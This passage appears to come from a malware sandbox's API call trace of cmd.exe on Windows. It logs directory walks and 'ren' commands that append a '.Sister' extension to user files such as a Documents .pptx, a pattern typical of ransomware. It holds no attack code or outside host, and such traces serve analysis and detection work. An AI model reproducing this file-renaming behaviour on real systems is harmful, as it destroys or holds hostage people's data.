nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65dd0 [0305.854] FindClose (in: hFindFile=0x21ed8d65dd0 | out: hFindFile=0x21ed8d65dd0) returned 1 [0305.854] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d66070 [0305.855] FindClose (in: hFindFile=0x21ed8d66070 | out: hFindFile=0x21ed8d66070) returned 1 [0305.855] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65ef0 [0305.855] FindClose (in: hFindFile=0x21ed8d65ef0 | out: hFindFile=0x21ed8d65ef0) returned 1 [0305.855] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.855] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.856] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.856] GetProcessHeap () returned 0x21ed8c70000 [0305.856] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66eb0 [0305.856] ??_V@YAXPEAX@Z () returned 0x1 [0305.856] ??_V@YAXPEAX@Z () returned 0x1 [0305.856] GetProcessHeap () returned 0x21ed8c70000 [0305.856] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d366f0, Size=0x490) returned 0x21ed8d366f0 [0305.856] GetProcessHeap () returned 0x21ed8c70000 [0305.856] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d366f0) returned 0x490 [0305.856] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.856] GetFileType (hFile=0x50) returned 0x2 [0305.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.856] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.872] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.879] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.879] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.879] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.879] GetFileType (hFile=0x50) returned 0x2 [0305.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.879] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.880] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.881] GetFileType (hFile=0x50) returned 0x2 [0305.881] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.881] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.881] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d366c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d366c0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.882] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.882] GetFileType (hFile=0x50) returned 0x2 [0305.882] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.882] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.883] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.889] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.890] GetFileType (hFile=0x50) returned 0x2 [0305.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.890] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.890] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.900] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.901] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.901] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.901] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.901] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.901] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.901] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.901] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.901] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.901] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.901] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.901] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.901] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.902] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.902] ??_V@YAXPEAX@Z () returned 0x1 [0305.902] GetProcessHeap () returned 0x21ed8c70000 [0305.902] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0305.902] GetProcessHeap () returned 0x21ed8c70000 [0305.902] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed8d2ce10 [0305.902] GetProcessHeap () returned 0x21ed8c70000 [0305.902] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2ce10) returned 0x130 [0305.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.902] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.902] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda2ffc00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.904] ??_V@YAXPEAX@Z () returned 0x1 [0305.904] GetProcessHeap () returned 0x21ed8c70000 [0305.904] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2e350 [0305.904] GetProcessHeap () returned 0x21ed8c70000 [0305.904] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0305.904] GetProcessHeap () returned 0x21ed8c70000 [0305.904] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d2d310 [0305.904] GetProcessHeap () returned 0x21ed8c70000 [0305.904] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d310) returned 0x130 [0305.904] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.904] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.904] GetProcessHeap () returned 0x21ed8c70000 [0305.905] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65b30 [0305.905] GetProcessHeap () returned 0x21ed8c70000 [0305.905] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93715d0 [0305.905] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.905] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.905] GetLastError () returned 0x2 [0305.905] GetProcessHeap () returned 0x21ed8c70000 [0305.905] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9426b40 [0305.905] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9426b50 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.905] SetErrorMode (uMode=0x0) returned 0x0 [0305.905] SetErrorMode (uMode=0x1) returned 0x0 [0305.905] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda2ffc00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.906] SetErrorMode (uMode=0x0) returned 0x1 [0305.906] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.906] GetProcessHeap () returned 0x21ed8c70000 [0305.906] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9370730 [0305.906] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.906] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.906] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.906] GetLastError () returned 0x2 [0305.906] ??_V@YAXPEAX@Z () returned 0x1 [0305.906] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.906] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.906] malloc (_Size=0xffce) returned 0x21eda30fbe0 [0305.906] ??_V@YAXPEAX@Z () returned 0x21eda30fbe0 [0305.907] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.907] GetLastError () returned 0x2 [0305.907] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.907] GetFileType (hFile=0x54) returned 0x2 [0305.907] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.907] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.907] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.907] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.908] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.908] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.908] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.915] longjmp () [0305.915] ??_V@YAXPEAX@Z () returned 0x1 [0305.915] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ed1040, ftCreationTime.dwHighDateTime=0x1d5f082, ftLastAccessTime.dwLowDateTime=0x6170f2b0, ftLastAccessTime.dwHighDateTime=0x1d5e401, ftLastWriteTime.dwLowDateTime=0x6170f2b0, ftLastWriteTime.dwHighDateTime=0x1d5e401, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="vbbIOYpRSq", cAlternateFileName="")) returned 1 [0305.915] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc710, ftCreationTime.dwHighDateTime=0x1d5cd9a, ftLastAccessTime.dwLowDateTime=0x7f6f1820, ftLastAccessTime.dwHighDateTime=0x1d5656f, ftLastWriteTime.dwLowDateTime=0x7f6f1820, ftLastWriteTime.dwHighDateTime=0x1d5656f, nFileSizeHigh=0x0, nFileSizeLow=0x18f64, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="W2kQL2VnNRU5xxXhQ.pptx", cAlternateFileName="")) returned 1 [0305.915] GetProcessHeap () returned 0x21ed8c70000 [0305.915] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x28e) returned 0x21ed8c758a0 [0305.916] GetProcessHeap () returned 0x21ed8c70000 [0305.916] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x28e [0305.916] GetProcessHeap () returned 0x21ed8c70000 [0305.916] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9436b30 [0305.916] GetProcessHeap () returned 0x21ed8c70000 [0305.916] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9436b30, Size=0x30) returned 0x21ed9436b30 [0305.916] GetProcessHeap () returned 0x21ed8c70000 [0305.916] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9436b30) returned 0x30 [0305.916] GetProcessHeap () returned 0x21ed8c70000 [0305.916] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9436b70 [0305.917] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c0c0 [0305.917] ??_V@YAXPEAX@Z () returned 0x1 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9436b70, Size=0x1e0) returned 0x21ed9436b70 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9436b70) returned 0x1e0 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9436d60 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9436d60, Size=0x290) returned 0x21ed9436d60 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9436d60) returned 0x290 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36b90 [0305.917] GetProcessHeap () returned 0x21ed8c70000 [0305.917] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36b90, Size=0x30) returned 0x21ed8d36b90 [0305.918] GetProcessHeap () returned 0x21ed8c70000 [0305.918] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36b90) returned 0x30 [0305.918] GetProcessHeap () returned 0x21ed8c70000 [0305.918] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36bd0 [0305.918] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.918] GetProcessHeap () returned 0x21ed8c70000 [0305.918] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bda0 [0305.918] ??_V@YAXPEAX@Z () returned 0x1 [0305.918] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.918] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d659b0 [0305.918] FindClose (in: hFindFile=0x21ed8d659b0 | out: hFindFile=0x21ed8d659b0) returned 1 [0305.919] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65950 [0305.919] FindClose (in: hFindFile=0x21ed8d65950 | out: hFindFile=0x21ed8d65950) returned 1 [0305.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0e88d36, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0e88d36, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8d65fb0 [0305.920] FindClose (in: hFindFile=0x21ed8d65fb0 | out: hFindFile=0x21ed8d65fb0) returned 1 [0305.920] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc710, ftCreationTime.dwHighDateTime=0x1d5cd9a, ftLastAccessTime.dwLowDateTime=0x7f6f1820, ftLastAccessTime.dwHighDateTime=0x1d5656f, ftLastWriteTime.dwLowDateTime=0x7f6f1820, ftLastWriteTime.dwHighDateTime=0x1d5656f, nFileSizeHigh=0x0, nFileSizeLow=0x18f64, dwReserved0=0x4, dwReserved1=0x7, cFileName="W2kQL2VnNRU5xxXhQ.pptx", cAlternateFileName="W2KQL2~1.PPT")) returned 0x21ed8d65650 [0305.920] FindClose (in: hFindFile=0x21ed8d65650 | out: hFindFile=0x21ed8d65650) returned 1 [0305.920] _wcsnicmp (_String1="W2KQL2~1.PPT", _String2="W2kQL2VnNRU5xxXhQ.pptx", _MaxCount=0x16) returned 8 [0305.920] malloc (_Size=0x1ff9c) returned 0x21eda31fbc0 [0305.921] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0305.922] GetProcessHeap () returned 0x21ed8c70000 [0305.922] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc86d0 [0305.923] ??_V@YAXPEAX@Z () returned 0x1 [0305.923] ??_V@YAXPEAX@Z () returned 0x1 [0305.923] GetProcessHeap () returned 0x21ed8c70000 [0305.923] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36bd0, Size=0x1d8) returned 0x21ed8d36bd0 [0305.923] GetProcessHeap () returned 0x21ed8c70000 [0305.923] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36bd0) returned 0x1d8 [0305.923] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.923] GetFileType (hFile=0x50) returned 0x2 [0305.923] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.923] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.924] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.931] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.931] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.931] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.931] GetFileType (hFile=0x50) returned 0x2 [0305.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.931] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.932] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.932] GetFileType (hFile=0x50) returned 0x2 [0305.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.933] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.933] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9436b40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9436b40*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.934] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"W2kQL2VnNRU5xxXhQ.pptx\" \"W2kQL2VnNRU5xxXhQ.pptx.Sister\" ") returned 58 [0305.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.934] GetFileType (hFile=0x50) returned 0x2 [0305.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.934] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: 